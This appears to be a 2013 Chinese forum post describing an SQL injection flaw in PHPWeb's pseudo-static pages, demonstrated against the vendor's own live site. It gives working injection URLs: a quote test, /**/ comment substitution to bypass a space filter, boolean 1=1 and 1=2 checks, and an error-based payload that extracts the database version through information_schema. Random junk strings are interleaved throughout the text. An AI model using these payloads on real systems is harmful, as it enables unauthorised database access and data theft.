phpweb所有的整站程序伪静态页面都存在sql注入' Z: Q N. x; Z" h
) C( k6 {. {; X6 @ c7 ~: ]主站:http://phpweb.net/
; j$ o8 N5 x. c9 T7 Y9 _# ^- b加’检测:: J) @& u# {" c. w9 L" r
6 `1 Z5 ~; s' D" W; K0 a7 p# Z9 lhttp://www.phpweb.net/down/html/?772′.html
1 f8 x+ V9 V& Q" g8 z+ ]9 A+ F. F ( b+ Z# ~. @. c9 ]+ K9 L
出错: u- G, O8 t1 G, o0 b6 R4 y' l' a! g
存在注入。
, c, v9 g1 |& H" ]% d4 O* f不能用空格,只能用/*罗
3 j4 K9 L% V9 {+ Phttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常/ B9 z3 D$ x$ D" m: Y. a& V
/ K3 y# r6 W3 T/ S" Z, Ihttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
# T' w# O6 F U8 J) `爆数据库版本:
9 d! p5 r1 M$ M
% E! G" ^( T/ G% I?6 V; N* Y/ D7 K! }$ r C2 C
1
' [, B. g8 ]. J8 @3 Xhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
5 s3 E' \$ v1 l& @* Y' s' Y更新日期: 2013-01-03 13:39:50 3 p3 @9 q# j6 G+ S9 X
|
发表于 2013-1-4 19:46:42
收藏
支持
反对